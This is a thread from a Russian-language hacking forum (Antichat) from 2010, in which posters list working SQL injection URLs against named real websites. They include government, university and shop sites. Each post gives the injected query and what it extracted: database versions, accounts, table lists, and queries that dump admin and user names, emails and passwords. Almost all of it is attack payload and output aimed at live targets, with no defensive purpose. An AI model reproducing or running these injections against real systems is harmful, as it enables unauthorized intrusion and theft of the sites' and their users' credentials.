ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12121  
Старый 12.05.2010, 21:02
p@pillon
Новичок
Регистрация: 03.05.2010
Сообщений: 4
Провел на форуме:
71594

Репутация: 4
По умолчанию

Pr 4

http://www.panlarchile2010.cl/espanol/pagina.php?id=-1+union+select+1,2,3,4,5,email,7,8,9,10,11,12,13,1 4+from+clientes+--+

Pr 5

http://www.taan.org.np/article1.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,Password,Name,12+from+tblAdmin


http://www.diariodemadryn.com/pagina.php?ID=-1+union+select+1,2,3,4,email,6,nombre,pass,9,10+fr om+lectores

Pr 5

http://www.copernico.ch/deutsch/pagina.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10

Version :4.1.22
User : copernico@localhost
Server :Apache/2.2.6 (Unix) PHP/5.2.10

Последний раз редактировалось p@pillon; 12.05.2010 в 21:24..
 
Ответить с цитированием

  #12122  
Старый 12.05.2010, 21:44
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.danceforfun.at
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.danceforfun.at/common.php?id=-3+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+
4.0.24_Debian-10sarge1
da000113@www-04.inode.at
da000113_d4f
pc-linux-gnu

============================================

Сайт: http://sports.njau.edu.cn
ТИЦ: 0
PR: 5
Примеры запросов:
Код:
http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6--+  

http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,group_concat(0x0b,table_name),5,6+from+information_schema.tables--+
version - 5.1.25-rc-community
user - root@localhost
database - sports
os - Win32
 
Ответить с цитированием

  #12123  
Старый 12.05.2010, 22:18
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

.gov

Код:
http://www.fppc.ca.gov/index.php?id=500 UNION ALL SELECT %String_Col%--
Host IP: 209.63.210.7
Web Server: Microsoft-IIS/6.0
Powered-by: PHP/5.2.10
DB Server: MySQL >=5
Current DB: webdb_dbo

Код:
http://prescott-az.gov/services/parks/parks/index.php?id=24  UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
Host IP: 63.229.103.73
Web Server: Apache
DB Server: MySQL >=4.1
Current DB: recreation
 
Ответить с цитированием

  #12124  
Старый 12.05.2010, 22:39
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
http://www.algol.com.ua/continents/countries/cities/places_t.php?ID=-1%20UNION%20SELECt%20concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29--+&CID=3&PID=1&PCID=1&PPID=&PPCID=2
PR:4
User: algolco_algol@localhost
Database: algolco_algol
Version: 5.0.90-community
 
Ответить с цитированием

  #12125  
Старый 12.05.2010, 23:29
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

Код:
http://www.rfidupdate.com/articles/index.php?id=1241 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15--
Host IP: 216.97.224.21
Web Server: Apache/1.3.41 (Unix) mod_fastcgi/2.4.6 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: rfidup2_rfidupdate


Код:
http://www.dsi-keyboards.com/keyboard/item.php?id=110  AND %True_Expression%
Host IP: 205.178.145.6
Web Server: Apache/2.2.8 (Unix) FrontPage/5.0.2.2635
Powered-by: PHP/5.2.6
DB Server: MySQL >=5
Current DB: dsi_image

хакИр

Код:
http://www.magfloat.com/telas/pagina.php?id=26 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7--
Host IP: 201.76.59.10
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MySQL >=5
Current DB: magfloat

Последний раз редактировалось KENT1994; 12.05.2010 в 23:42..
 
Ответить с цитированием

  #12126  
Старый 13.05.2010, 04:57
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Цитата:
http://www.jhortscib.com/show_abs.php?newid=1067+and+2=1+union+select+1,2,3 ,4,version(),6,7,8,9%23
pr6
5.0.51a-community-log
 
Ответить с цитированием

  #12127  
Старый 13.05.2010, 10:40
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Код:
http://www.convice.ru/lev/3/2/id/-8+union+select+null,null,version(),null,null,null,null,null,null
PostgreSQL 8.0.7 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
Код:
http://www.eliteshina.ru/tyreinfo.php?id=-598+union+select+version();--
PostgreSQL 8.2.3 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20061011 (Red Hat 4.1.1-30) (вывод в title)
Код:
http://farm.x-price.ru/subscriber.php?id=-1839+union+select+null,null,null,null,null,null,version();--+
PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

Последний раз редактировалось krypt3r; 13.05.2010 в 15:41..
 
Ответить с цитированием

  #12128  
Старый 13.05.2010, 12:31
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Код:
http://www.protok.ru/price2.php3?idgr=-2+and+1=2+union+select+concat_ws(0x3a,@@version,user(),database(),@@version_compile_os)+--
version : 4.0.27-standart
user : protok@localhost
database : db_protok
os : pc-linux-gnu
 
Ответить с цитированием

  #12129  
Старый 13.05.2010, 12:38
ZAV
Новичок
Регистрация: 06.05.2010
Сообщений: 7
Провел на форуме:
16119

Репутация: 1
По умолчанию

www.javaportal.ru/books/aboutbook.php?id=30UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--

http://www.sbi.org.br/padrao.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,versio n(),database(),user()),7,8,9--

http://www.xtremewarrior.com/post_comment.php?id=-1999+union+select+1,2,unhex(hex(concat_ws(0x3a,adm in_name,admin_pwd,%20admin_id))),4,5,6+from+admin--
 
Ответить с цитированием

  #12130  
Старый 13.05.2010, 20:11
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.vtmit.vt.edu
ТИЦ: 0
PR: 4
Пример запроса:
Код:
http://www.vtmit.vt.edu/academics/module.php?id=-7+union+select+1,concat(version(),0x0b,user(),0x0b,database(),0x0b,@@version_compile_os,0x0b),null,group_concat(0x0b,table_name)+from+information_schema.tables--+
version - 5.0.77
user - iddl@thnad
database - iddl
os - redhat-linux-gnu

============================================

Сайт: http://www.som.si
ТИЦ: 0
PR: 2
Примеры запросов:
Код:
http://www.som.si/shop_item.php?id=-6153+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,group_concat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables--+  

http://www.som.si/shop_item.php?id=-6153+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,group_concat(0x0b,user_id,0x3a,username,0x3a,password,0x3a,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+phorum_users--+
version - 5.1.41-3ubuntu12
user - somsi@plesk2.gigaspark.com
database - somsi
os - debian-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
ENGINES,   
EVENTS,   
FILES,   
GLOBAL_STATUS,   
GLOBAL_VARIABLES,   
KEY_COLUMN_USAGE,   
PARTITIONS,   
PLUGINS,   
PROCESSLIST,   
PROFILING,   
REFERENTIAL_CONSTRAINTS,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
SESSION_STATUS,   
SESSION_VARIABLES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
artikli,   
artikli_davek,   
artikli_material,   
artikli_skupine,   
artikli_znamke,   
kapitalci,   
kategorije_tekmovanj,   
kje_loviti,   
komentarji,   
kulinarika,   
kupci_dobavitelji,   
kupci_dobavitelji_07,   
modules,   
naj_zgodba,   
naj_zgodba_vote,   
newsletter,   
oglasi,   
payment,   
phorum_banlists,   
phorum_files,   
phorum_forum_group_xref,   
phorum_forums,   
phorum_groups,   
phorum_messages,   
phorum_private_messages,   
phorum_settings,   
phorum_subscribers,   
phorum_user_group_xref,   
phorum_user_newflags,   
phorum_user_permissions,   
phorum_users,   
phorum_users_address,   
povezave,   
promet,   
promet_07,   
promet_faktura,   
promet_faktura_07,   
shop_cart_items_tmp,   
skladisce
============================================

Сайт: http://polnolunie.com
ТИЦ: 0
PR: 1
Примеры запросов:
Код:
http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,table_name),5,6,7,8,9,10,11,12,13,14/**/from/**/information_schema.tables--  

http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,group_concat(0x0b,email),3,group_concat(0x0b,username,0x3a,pass),5,6,7,8,9,10,11,12,13,14/**/from/**/users--  

http://polnolunie.com/browse.php?cat=-8/**/union/**/select/**/1,group_concat(0x0b,user_email),3,group_concat(0x0b,username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14/**/from/**/phpbb_users--
version - 5.1.46
user - client@localhost
database - polnolunie
os - portbld-freebsd8.0
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
ENGINES,   
EVENTS,   
FILES,   
GLOBAL_STATUS,   
GLOBAL_VARIABLES,   
KEY_COLUMN_USAGE,   
PARTITIONS,   
PLUGINS,   
PROCESSLIST,   
PROFILING,   
REFERENTIAL_CONSTRAINTS,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
SESSION_STATUS,   
SESSION_VARIABLES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
categories,   
cities,   
items,   
leftmenu,   
materials,   
news,   
order_items,   
orders,   
phpbb_auth_access,   
phpbb_banlist,   
phpbb_categories,   
phpbb_config,   
phpbb_confirm,   
phpbb_disallow,   
phpbb_forum_prune,   
phpbb_forums,   
phpbb_groups,   
phpbb_posts,   
phpbb_posts_text,   
phpbb_privmsgs,   
phpbb_privmsgs_text,   
phpbb_ranks,   
phpbb_search_results,   
phpbb_search_wordlist,   
phpbb_search_wordmatch,   
phpbb_sessions,   
phpbb_sessions_keys,   
phpbb_smilies,   
phpbb_themes,   
phpbb_themes_name,   
phpbb_topics,   
phpbb_topics_watch,   
phpbb_user_group,   
phpbb_users,   
phpbb_vote_desc,   
phpbb_vote_results,   
phpbb_vote_voters,   
phpbb_words,   
states,   
stock,   
users,   
tblBlack
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT.XYZ